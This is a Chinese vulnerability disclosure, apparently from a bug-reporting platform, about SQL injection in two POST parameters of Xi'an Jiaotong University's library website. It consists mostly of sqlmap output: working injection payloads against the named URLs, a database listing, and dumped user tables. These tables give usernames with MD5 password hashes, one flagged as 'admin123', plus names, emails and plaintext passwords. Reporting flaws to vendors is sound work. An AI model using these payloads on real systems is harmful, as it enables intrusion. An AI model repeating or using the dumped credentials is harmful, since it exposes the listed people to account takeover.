2015-03-30: 细节已通知厂商并且等待厂商处理中 2015-03-30: 厂商已经确认,细节仅向厂商公开 2015-04-09: 细节向核心白帽子及相关领域专家公开 2015-04-19: 细节向普通白帽子公开 2015-04-29: 细节向实习白帽子公开 2015-05-14: 细节向公众公开
POST sql注入
http://www.lib.xjtu.edu.cn/bookriview.do post参数action=page&sortType=*&goal=*&indexPage=1&bookname=*另一处:http://www.lib.xjtu.edu.cn/news.do post参数action=page&sortType=*&goal=*&indexPage=1&title=*
sqlmap identified the following injection points with a total of 1236 HTTP(s) requests:---Parameter: bookname (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: action=page&subject=88952634&goal=88952634&indexPage=1&bookname=88952634' AND (SELECT 6480 FROM(SELECT COUNT(*),CONCAT(0x71626b7a71,(SELECT (CASE WHEN (6480=6480) THEN 1 ELSE 0 END)),0x7171717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hfBm'='hfBm Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: action=page&subject=88952634&goal=88952634&indexPage=1&bookname=88952634' AND 6748=BENCHMARK(5000000,MD5(0x5142424a)) AND 'lsfG'='lsfG Vector: AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])---web application technology: JSPback-end DBMS: MySQL 5.0available databases [12]:[*] arc[*] information_schema[*] journal[*] lib[*] libcms[*] mysql[*] resourceGate[*] resourceNav[*] shanxicalis[*] test[*] xbnlcms[*] xnoldsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: bookname (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: action=page&subject=88952634&goal=88952634&indexPage=1&bookname=88952634' AND (SELECT 6480 FROM(SELECT COUNT(*),CONCAT(0x71626b7a71,(SELECT (CASE WHEN (6480=6480) THEN 1 ELSE 0 END)),0x7171717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hfBm'='hfBm Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: action=page&subject=88952634&goal=88952634&indexPage=1&bookname=88952634' AND 6748=BENCHMARK(5000000,MD5(0x5142424a)) AND 'lsfG'='lsfG Vector: AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])---web application technology: JSPback-end DBMS: MySQL 5.0Database: libcmsTable: user[7 columns]+------------+| Column |+------------+| DEPARTMENT || EMAIL || ID || NAME || PASSWORD || STATUS || USERNAME |+------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: bookname (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: action=page&subject=88952634&goal=88952634&indexPage=1&bookname=88952634' AND (SELECT 6480 FROM(SELECT COUNT(*),CONCAT(0x71626b7a71,(SELECT (CASE WHEN (6480=6480) THEN 1 ELSE 0 END)),0x7171717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hfBm'='hfBm Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: action=page&subject=88952634&goal=88952634&indexPage=1&bookname=88952634' AND 6748=BENCHMARK(5000000,MD5(0x5142424a)) AND 'lsfG'='lsfG Vector: AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])---web application technology: JSPback-end DBMS: MySQL 5.0sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: bookname (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: action=page&subject=88952634&goal=88952634&indexPage=1&bookname=88952634' AND (SELECT 6480 FROM(SELECT COUNT(*),CONCAT(0x71626b7a71,(SELECT (CASE WHEN (6480=6480) THEN 1 ELSE 0 END)),0x7171717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hfBm'='hfBm Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: action=page&subject=88952634&goal=88952634&indexPage=1&bookname=88952634' AND 6748=BENCHMARK(5000000,MD5(0x5142424a)) AND 'lsfG'='lsfG Vector: AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])---web application technology: JSPback-end DBMS: MySQL 5.0Database: libcmsTable: user[36 entries]+--------------+----------------------------------+| USERNAME | PASSWORD |+--------------+----------------------------------+| admin | 0192023a7bbd73250516f069df18b500 | (弱口令密码admin123)| admin123 | 0192023a7bbd73250516f069df18b500 | (弱口令密码admin123)| caifang | 0495fa657d3a4a348aad8f2c1bd8e8bc || mysk | 05e67caa6913bd3c2b63a2b6ce2a289f || chenbin | 18a8474b67bb1f43cb4e41e600294d70 || hanmeng | 1a9dd20c01de9e76683aba9ddf23d30b || zhanglin | 202cb962ac59075b964b07152d234b70 || zhouqi | 21232f297a57a5a743894a0e4a801fc3 || gaowenli | 238c26372e700c58d689924060a8d5eb || qikan | 30f175e6bff6fced1a99398750260018 || zhangzy | 31568e2c93090de9b71bac40f188e983 || lijuan | 3341af1b873a60450a0e0388f7621d38 || myjxw | 38c3da00544da9f3928208a8e9fca0d7 || zhangxm | 45105a5f6b77081b9e40c65b95c42fd6 || bianmu | 496cdd655db28ab0ae546071485621c8 || liutong | 4a13ce88290625fe7531df5d3bc1ae5b || gaojianzhong | 4c077802118f286dc1481e7aa77dc228 || zhouqin | 73543541802e25aedd8402f584a5f9a0 || zhangjing | 7a53928fa4dd31e82c6ef826f341daec || yuanmei | 95a00694c96679ea7481fd361c07cd91 || lidan | 9882a23bb4373c6f291200d07c9a6739 || lidan | a176d29d37c64d4df44cf5b07330276b || weiqingshan | b5659d581bb341db24d1d796e30ab345 || zhouq | b5659d581bb341db24d1d796e30ab345 || chenn | b63e29d4358ed6018d60cfcd0f99fbc4 || chenwei | b63e29d4358ed6018d60cfcd0f99fbc4 || qiaoyaming | b63e29d4358ed6018d60cfcd0f99fbc4 || yuelan | ba05aa90ea6f23a0729cb5d9aa3a7f65 || zixun | bb460906a52ff5d514ac7cbd9e17c982 || qiuping | bbb65a57d4a599487fcc558559e6e1ac || zhangzhiyan | cd4b097bece019787c3f80060b455d90 || luohong | dd9c0929817c5d38a4ff6193a260b34e || myxs | ddc692ea9caae72071d6343d2620a222 || suwanying | e10adc3949ba59abbe56e057f20f883e || tanshuping | e902a36ade483cde97d806974068a10f || yejian | f411c16058201360ce74fd1b9dce1370 |
web application technology: JSPback-end DBMS: MySQL 5.0Database: libcmsTable: user[36 entries]+--------------+----------------------------------+| USERNAME | PASSWORD |+--------------+----------------------------------+| admin | 0192023a7bbd73250516f069df18b500 | (弱口令密码admin123)| admin123 | 0192023a7bbd73250516f069df18b500 | (弱口令密码admin123)| caifang | 0495fa657d3a4a348aad8f2c1bd8e8bc || mysk | 05e67caa6913bd3c2b63a2b6ce2a289f || chenbin | 18a8474b67bb1f43cb4e41e600294d70 || hanmeng | 1a9dd20c01de9e76683aba9ddf23d30b || zhanglin | 202cb962ac59075b964b07152d234b70 || zhouqi | 21232f297a57a5a743894a0e4a801fc3 || gaowenli | 238c26372e700c58d689924060a8d5eb || qikan | 30f175e6bff6fced1a99398750260018 || zhangzy | 31568e2c93090de9b71bac40f188e983 || lijuan | 3341af1b873a60450a0e0388f7621d38 || myjxw | 38c3da00544da9f3928208a8e9fca0d7 || zhangxm | 45105a5f6b77081b9e40c65b95c42fd6 || bianmu | 496cdd655db28ab0ae546071485621c8 || liutong | 4a13ce88290625fe7531df5d3bc1ae5b || gaojianzhong | 4c077802118f286dc1481e7aa77dc228 || zhouqin | 73543541802e25aedd8402f584a5f9a0 || zhangjing | 7a53928fa4dd31e82c6ef826f341daec || yuanmei | 95a00694c96679ea7481fd361c07cd91 || lidan | 9882a23bb4373c6f291200d07c9a6739 || lidan | a176d29d37c64d4df44cf5b07330276b || weiqingshan | b5659d581bb341db24d1d796e30ab345 || zhouq | b5659d581bb341db24d1d796e30ab345 || chenn | b63e29d4358ed6018d60cfcd0f99fbc4 || chenwei | b63e29d4358ed6018d60cfcd0f99fbc4 || qiaoyaming | b63e29d4358ed6018d60cfcd0f99fbc4 || yuelan | ba05aa90ea6f23a0729cb5d9aa3a7f65 || zixun | bb460906a52ff5d514ac7cbd9e17c982 || qiuping | bbb65a57d4a599487fcc558559e6e1ac || zhangzhiyan | cd4b097bece019787c3f80060b455d90 || luohong | dd9c0929817c5d38a4ff6193a260b34e || myxs | ddc692ea9caae72071d6343d2620a222 || suwanying | e10adc3949ba59abbe56e057f20f883e || tanshuping | e902a36ade483cde97d806974068a10f || yejian | f411c16058201360ce74fd1b9dce1370 |
以下表的密码明文存储
web application technology: JSPback-end DBMS: MySQL 5.0Database: xnoldTable: db_user[3 entries]+----+---------------+-------------------+---------+---------+----------+| id | name | email | account | role_fk | password |+----+---------------+-------------------+---------+---------+----------+| 1 | 韩进 | xjtu_java@163.com | admin | 1 | admin || 2 | �昊| xjtu_uu@163.com | test3 | 3 | 1 || 6 | 2 | 2 | test2 | 2 | 2 |+----+---------------+-------------------+---------+---------+----------+
注意参数过滤
危害等级:中
漏洞Rank:6
确认时间:2015-03-30 10:46
通知用户处理中
暂无